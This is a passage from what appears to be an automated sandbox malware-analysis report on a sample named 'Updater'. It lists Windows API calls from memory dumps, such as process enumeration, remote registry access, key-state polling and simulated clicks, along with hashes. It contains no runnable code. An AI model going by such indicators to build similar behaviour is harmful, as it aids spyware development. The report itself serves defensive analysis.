                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00BAAE1F
                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00BAAE2D
                                                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00BAAE60
                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00BAB035
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3488606520-0
                                                                                                                                                    • Opcode ID: 2d78f80b43dd86c87f792785cc2343d4c8776b7e76c3840b33c9ad676673c0e3
                                                                                                                                                    • Instruction ID: 6b35d42bffc7e7bc54b94655a4070d2c278eb0532ea1db13968a2cff4dfae103
                                                                                                                                                    • Opcode Fuzzy Hash: 2d78f80b43dd86c87f792785cc2343d4c8776b7e76c3840b33c9ad676673c0e3
                                                                                                                                                    • Instruction Fuzzy Hash: 36A19A71604300AFD320DF24D896F2AB7E1AF44710F14889DF9A9DB292DBB5ED408B92
                                                                                                                                                    APIs
                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 00BAB0A4
                                                                                                                                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00BAB0B2
                                                                                                                                                      • Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45
                                                                                                                                                    • CompareStringW.KERNEL32(00000400,00000001,?,?,?,?,?), ref: 00BAB136
                                                                                                                                                    • Process32NextW.KERNEL32(00000000,?), ref: 00BAB19E
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00BAB1B0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1991900642-0
                                                                                                                                                    • Opcode ID: 934f19617e8ea02888a2fd982074d090c2d2bba96699b25e890f0855df355260
                                                                                                                                                    • Instruction ID: 709c16e3ec955a2df5c2a25f62dca8b775c325f3d852eb756d8a3f1d0335c798
                                                                                                                                                    • Opcode Fuzzy Hash: 934f19617e8ea02888a2fd982074d090c2d2bba96699b25e890f0855df355260
                                                                                                                                                    • Instruction Fuzzy Hash: DA6168B1508311AFC710EF64D886E6BBBE8FF89750F00496DF99997291EB30D904CB92
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B2FA3B: _wcslen.LIBCMT ref: 00B2FA45
                                                                                                                                                      • Part of subcall function 00BAD398: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00BAC0AE,?,?), ref: 00BAD3B5
                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00BAC4A5
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BAC500
                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00BAC563
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00BAC5A6
                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00BAC5B3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_wcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3132563372-0
                                                                                                                                                    • Opcode ID: 08c041c82acfb9ccb6184302b868ddf364ecfdf76b42c37e66cc1812ac6ac83a
                                                                                                                                                    • Instruction ID: 2c44dbf3c380e6f8271c2a62ca77fe36d94683c66373b3b5d96d330de6854625
                                                                                                                                                    • Opcode Fuzzy Hash: 08c041c82acfb9ccb6184302b868ddf364ecfdf76b42c37e66cc1812ac6ac83a
                                                                                                                                                    • Instruction Fuzzy Hash: 2F61B231508201AFC714DF24C491E6ABBE5FF89308F5489ACF49A8B2A2DB35ED45CB91
                                                                                                                                                    APIs
                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B9968D
                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00B996B9
                                                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B99711
                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B99736
                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B9973E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2832842796-0
                                                                                                                                                    • Opcode ID: df9c50b4c1e00f817e3dd80746c504894f614642a7eb2ab86bf6ef9385f01ec8
                                                                                                                                                    • Instruction ID: f0bc6cb154f435652a5f10798fe9f692b1eeaa7a5b054b1dcf9652decd95f74e
                                                                                                                                                    • Opcode Fuzzy Hash: df9c50b4c1e00f817e3dd80746c504894f614642a7eb2ab86bf6ef9385f01ec8
                                                                                                                                                    • Instruction Fuzzy Hash: 39511E35A00219EFCF15DF54C881A6ABBF5FF48714F0480A8E949AB362DB39ED41DB60
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00BA9924
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00BA99B4
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00BA99D0
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00BA9A16
                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00BA9A36
                                                                                                                                                      • Part of subcall function 00B400D3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00B91DC1,?,753CE610), ref: 00B400F0
                                                                                                                                                      • Part of subcall function 00B400D3: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00B80B20,00000000,00000000,?,?,00B91DC1,?,753CE610,?,00B80B20), ref: 00B40117
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 666041331-0
                                                                                                                                                    • Opcode ID: af27e03c777207e6a754edd1450d1b0fdaf69aade274b049052e4608ff7ef0fa
                                                                                                                                                    • Instruction ID: 5dd548119084369989a69c24d37f8cefcc31309e1a1af2b3e649f6030d41bc6e
                                                                                                                                                    • Opcode Fuzzy Hash: af27e03c777207e6a754edd1450d1b0fdaf69aade274b049052e4608ff7ef0fa
                                                                                                                                                    • Instruction Fuzzy Hash: 38516B35604215EFCB10DF58C4909AEBBF4FF49714B0480E9E919AB322DB31EE85DB91
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 895b54a9bbc4349eb04225c008664320b3e148843369f2fe0b68ba8bd9962f93
                                                                                                                                                    • Instruction ID: 8164b3aba6e22c1a50032ef55794ec20760b530eda6d59f05e6103f6842af080
                                                                                                                                                    • Opcode Fuzzy Hash: 895b54a9bbc4349eb04225c008664320b3e148843369f2fe0b68ba8bd9962f93
                                                                                                                                                    • Instruction Fuzzy Hash: DF419335648104AFD7248F6CCC88FF57BE5EB99350F1502A5F91AA72E0DBB0AD50D690
                                                                                                                                                    APIs
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00B34B88
                                                                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 00B34BA5
                                                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00B34BCE
                                                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00B34BE8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4210589936-0
                                                                                                                                                    • Opcode ID: 0c16d7ac17f0d54951b0c7d89593d64919a60058d1e4fd9fffa7abed71bfdbbb
                                                                                                                                                    • Instruction ID: 51bc2f10c40aa4fafb0776cf10be45cc962914594644ae56da74c1b0a4273505
                                                                                                                                                    • Opcode Fuzzy Hash: 0c16d7ac17f0d54951b0c7d89593d64919a60058d1e4fd9fffa7abed71bfdbbb
                                                                                                                                                    • Instruction Fuzzy Hash: A5417231A0811ABFDF159F64C884BEEB7B4FB09320F208395E439A7290DB756950DBA1
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000002), ref: 00B962C9
                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B9634B
                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00B96371
                                                                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B96396
                                                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00B963C2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateFileHardLink$AttributesDeleteErrorLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4077537916-0
                                                                                                                                                    • Opcode ID: 8e390d68b6f8bfbc945d5b8070bf35163b07ed88ca3284ba0c7be86ab7fd77a7
                                                                                                                                                    • Instruction ID: 589c2d570adcd8ed9aa8a029e8f08bd9b4ff64244a35a04813cdfb365de99749
                                                                                                                                                    • Opcode Fuzzy Hash: 8e390d68b6f8bfbc945d5b8070bf35163b07ed88ca3284ba0c7be86ab7fd77a7
                                                                                                                                                    • Instruction Fuzzy Hash: 07414C35200624DFCF10DF14D554A5EBBE1EF49B20B1880D8E95AAB362CB79FE01CBA5
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00B82A2F
                                                                                                                                                    • PostMessageW.USER32(00000001,00000201,00000001), ref: 00B82ADB
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?), ref: 00B82AE3
                                                                                                                                                    • PostMessageW.USER32(00000001,00000202,00000000), ref: 00B82AF4
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00B82AFC
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3382505437-0
                                                                                                                                                    • Opcode ID: e977bbcf8767ec7b5444ee13810c57a36c6e2d39270f2fea8bbc25fe60050511
                                                                                                                                                    • Instruction ID: c402f6c95f41b2a05b78f69a32c015cf02f8c70213f1c70cc1d80bc16c19f1d6
                                                                                                                                                    • Opcode Fuzzy Hash: e977bbcf8767ec7b5444ee13810c57a36c6e2d39270f2fea8bbc25fe60050511
                                                                                                                                                    • Instruction Fuzzy Hash: 0531C471900219EFDB18DFA8CD89BDE7BB5EF04315F104259F925A72E0D7709954CB90
                                                                                                                                                    APIs
                                                                                                                                                    • IsWindow.USER32(00000000), ref: 00BA151D
                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00BA1534
                                                                                                                                                    • GetDC.USER32(00000000), ref: 00BA1570
                                                                                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 00BA157C
                                                                                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 00BA15B4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4156661090-0
                                                                                                                                                    • Opcode ID: 1d7c5f9e72a4ecad3c9f70f2c769a5e2dd3ce692f9a0977e8bf56e9a8e89b92e
                                                                                                                                                    • Instruction ID: 5df16ab145c4a17702fdba3edd43738d6de1d65b8f7449a83bbf8509b6d78487
                                                                                                                                                    • Opcode Fuzzy Hash: 1d7c5f9e72a4ecad3c9f70f2c769a5e2dd3ce692f9a0977e8bf56e9a8e89b92e
                                                                                                                                                    • Instruction Fuzzy Hash: 68219F75A00214AFDB04DF69D885AAEB7F8EF88710F0085B8E84AD7351DA74ED40CFA0
                                                                                                                                                    APIs
                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00B5CBF6
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B5CC19
                                                                                                                                                      • Part of subcall function 00B5282E: RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00B40445,?,?,00B2FA72,00000000,?,?,?,00B21188,?), ref: 00B52860
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00B5CC3F
                                                                                                                                                    • _free.LIBCMT ref: 00B5CC52
                                                                                                                                                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00B5CC61
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 336800556-0
                                                                                                                                                    • Opcode ID: c5b2f99226dc66bad61eebd4afd65dbd87421d54ac3ac6c293cf495a6fe67067
                                                                                                                                                    • Instruction ID: ef92ae97b75873d07280909f03a989dd0f36810fdf6f4bca6023477d195fc94f
                                                                                                                                                    • Opcode Fuzzy Hash: c5b2f99226dc66bad61eebd4afd65dbd87421d54ac3ac6c293cf495a6fe67067
                                                                                                                                                    • Instruction Fuzzy Hash: EB0171766023157F272166AA5C8CE7B6EEEDEC6B6231402E9FD09D3241EE648C0591F0
                                                                                                                                                    APIs
                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00B526D1,00B5281A,?,?,00B2FC79,?,?,00B2111E), ref: 00B52CD4
                                                                                                                                                    • _free.LIBCMT ref: 00B52D09
                                                                                                                                                    • _free.LIBCMT ref: 00B52D30
                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00B52D3D
                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00B52D46
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                    • Opcode ID: 86c9fbb8687fdd60f2062081db4f03b932df85eedf91a60eab46677c6b323e92
                                                                                                                                                    • Instruction ID: 3fa1f9b0e16e3696b1de3014bb8dc07aded63a7b3f13ef2e6a5238dd6dd80db7
                                                                                                                                                    • Opcode Fuzzy Hash: 86c9fbb8687fdd60f2062081db4f03b932df85eedf91a60eab46677c6b323e92
                                                                                                                                                    • Instruction Fuzzy Hash: AE01D136202641AB871667286CC5F2B21F9DBD77B3B3401F4FD00A72E2FEA58C0D5160
                                                                                                                                                    APIs
                                                                                                                                                    • CLSIDFromProgID.OLE32(?,?,?,?,?,?,?,-C000001E,00000001,?,00B80FDC,80070057), ref: 00B810C8
                                                                                                                                                    • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00B80FDC,80070057), ref: 00B810E3
                                                                                                                                                    • lstrcmpiW.KERNEL32(?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00B80FDC,80070057), ref: 00B810F1
                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,?,?,?,?,-C000001E,00000001,?,00B80FDC,80070057), ref: 00B81101
                                                                                                                                                    • CLSIDFromString.OLE32(?,?,?,?,?,?,?,?,?,-C000001E,00000001,?,00B80FDC,80070057), ref: 00B8110D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3897988419-0
                                                                                                                                                    • Opcode ID: 2363b409d0f595cb6d52f63ce05f06e72552410f86e2856ff136c02ad4835713
                                                                                                                                                    • Instruction ID: ba20e78b23bf92299b3091c8222e88b3a5bdc6229fb51ce7e29b1b4ba068c395
                                                                                                                                                    • Opcode Fuzzy Hash: 2363b409d0f595cb6d52f63ce05f06e72552410f86e2856ff136c02ad4835713
                                                                                                                                                    • Instruction Fuzzy Hash: 5001D472602204ABDB106F18DC48BAABBECEB44762F104564FE09D3220FB75CD41CBA0
                                                                                                                                                    APIs
                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00B8F811
                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 00B8F81F
                                                                                                                                                    • Sleep.KERNEL32(00000000), ref: 00B8F827
                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00B8F831
                                                                                                                                                    • Sleep.KERNEL32 ref: 00B8F86D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
